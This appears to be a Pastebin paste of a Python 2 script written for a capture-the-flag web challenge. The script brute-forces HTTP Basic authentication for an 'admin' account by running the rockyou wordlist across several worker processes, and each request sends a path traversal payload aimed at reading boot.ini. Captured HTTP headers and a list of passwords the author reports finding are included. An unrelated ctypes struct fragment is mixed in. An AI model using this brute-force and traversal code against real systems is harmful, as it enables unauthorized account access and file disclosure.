API tools faq
paste
Ikuzo

Untitled

Ikuzo
Sep 30th, 2017
78
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.15 KB | None | 0 0
raw download clone embed print report
  1. #! /usr/bin/env python
  2.  
  3. """
  4. POST /johnny/admin/ HTTP/1.1
  5. Host: web.onlinectf.com
  6. User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
  7. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  8. Accept-Language: en-US,en;q=0.5
  9. Accept-Encoding: gzip, deflate
  10. Referer: http://web.onlinectf.com/johnny/
  11. DNT: 1
  12. Authorization: Basic YWRtaW46YWNhc2E=
  13. Connection: keep-alive
  14. Upgrade-Insecure-Requests: 1
  15. """
  16.  
  17.  
  18. """
  19. HTTP/1.1 401 Unauthorized
  20. Date: Sat, 16 Sep 2017 22:28:33 GMT
  21. Content-Type: text/html; charset=iso-8859-1
  22. Transfer-Encoding: chunked
  23. Connection: keep-alive
  24. Set-Cookie: __cfduid=d411d098596d463eb43b24caa6291ed571505600913; expires=Sun, 16-Sep-18 22:28:33 GMT; path=/; domain=.onlinectf.com; HttpOnly
  25. x-frame-options: SAMEORIGIN
  26. WWW-Authenticate: Basic realm="Restricted Area"
  27. Server: cloudflare-nginx
  28. CF-RAY: 39f7426c72b52926-OTP
  29. """
  30. '''
  31. HTTP/1.1 500 Internal Server Error
  32. Date: Sun, 17 Sep 2017 06:14:32 GMT
  33. Content-Type: text/html; charset=iso-8859-1
  34. Transfer-Encoding: chunked
  35. Connection: keep-alive
  36. Set-Cookie: __cfduid=d983b9f19a48f57d534489ada8b8fdf9e1505628871; expires=Mon, 17-Sep-18 06:14:31 GMT; path=/; domain=.onlinectf.com; HttpOnly
  37. x-frame-options: SAMEORIGIN
  38. Server: cloudflare-nginx
  39. CF-RAY: 39f9ed017391290e-OTP
  40. '''
  41. '''
  42. _fields_ = [
  43. ("magic", c_char * 4),
  44. ("payload_size", c_uint32),
  45. ("header_md5", c_ubyte * 8),
  46. ("etl", c_uint8 * 7), # always zero
  47. ("unused_1", c_char),
  48. ("password_len", c_uint16),
  49. ("padding_len", c_uint16),
  50. ("unused_2", c_ubyte * 4),
  51. ("plaintext_md5", c_ubyte * 16)
  52. ]
  53.  
  54. names = [
  55. "magic",
  56. "payload_size",
  57. "header_md5",
  58. "etl",
  59. "unused_1",
  60. "password_len",
  61. "padding_len",
  62. "unused_2",
  63. "plaintext_md5"
  64. ]
  65. '''
  66.  
  67. from http.client import *
  68. from base64 import b64encode
  69. import multiprocessing as mp
  70. import optparse
  71.  
  72. # by default pass_file is
  73. # pfile = "/usr/share/wordlists/rockyou.txt"
  74. username = "admin"
  75. pfile = "/usr/share/wordlists/rockyou.txt"
  76.  
  77. def main():
  78. parser = optparse.OptionParser("usage%prog" +\
  79. "-u <username> -p <password_list>")
  80. parser.add_option( "-u", dest="uname", type="string", \
  81. help="specify username")
  82. parser.add_option( "-p", dest="plist", type="string", \
  83. help="specify password list")
  84. (options, args) = parser.parse_args()
  85. if (options.uname == None) | (options.plist == None):
  86. print parser.usage
  87. username = "admin"
  88. pfile = "/usr/share/wordlists/rockyou.txt"
  89. else:
  90. username = options.uname
  91. pfile = options.plist
  92.  
  93. print "[+] BF for username : {0}".format(username)
  94. print "[+] Chosen pw list : {0}".format(pfile)
  95.  
  96.  
  97. N_CPU = 3
  98. N = 64
  99. pool = mp.Pool(N_CPU)
  100.  
  101. print "Multi Starting"
  102. with open(pfile) as passfile:
  103. pool.imap_unordered(OpenConnection, (password for password in passfile))
  104. pool.close()
  105. pool.join()
  106.  
  107. def OpenConnection(passwd):
  108. '''
  109. worker function which creates HTTP Connection
  110. if returned status code is other than 500
  111. it means that auth has taken place
  112. '''
  113. print "[*] Trying {0}".format(passwd)
  114. conection1 = HTTPConnection("web.onlinectf.com", 80)
  115.  
  116. passwd = passwd.rstrip()
  117. #create username:password b64 encode string for HTTP header
  118. userpass = bytes(username + ':' + passwd)
  119. string_userpass = b64encode(userpass).decode('iso-8859-1')
  120. auth_header = { 'Authorization' : 'Basic %s' % string_userpass}
  121. #print auth_header
  122. #Submitting POST method
  123. conection1.request('POST', '/johnny/admin/logging/logviewer.jsp?logfile=../../../../../../../boot.ini', headers=auth_header)
  124. response = conection1.getresponse()
  125. print response.getheaders()
  126. print "--------------------------"
  127. #print response.status
  128. if response.status != 500:
  129. print "[-------------------------------------------]"
  130. print "[+] Status: {0} for pws: {1}".format(response.status, passwd)
  131. print "[+] Auth header: {0}".format(string_userpass)
  132. print "[-------------------------------------------]"
  133. return 0
  134.  
  135.  
  136. # callback running only in __main__
  137.  
  138. def quit(arg):
  139. print "quitting with %g" % arg
  140. # note: p is visible because it's global in __main__
  141. pool.terminate() # kill all pool workers
  142.  
  143. if __name__ == '__main__':
  144. main()
  145. #OpenConnection("#1HOGETTE")
  146. #OpenConnection("#1HOLDEN")
  147. #OpenConnection("#1HOGFAN")
  148. #OpenConnection("$$$ODIE")
  149. #OpenConnection("$$$money")
  150. #OpenConnection("$GETMONEY")
  151.  
  152. '''
  153. pws found:
  154. [+] Password found: #1HOGETTE
  155. [+] Password found: #1HOLDEN
  156. [+] Password found: #1HOGFAN
  157. [+] Password found: $$$ODIE
  158. [+] Password found: $$$money
  159. [+] Password found: $GETMONEY
  160.  
  161.  
  162. '''
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!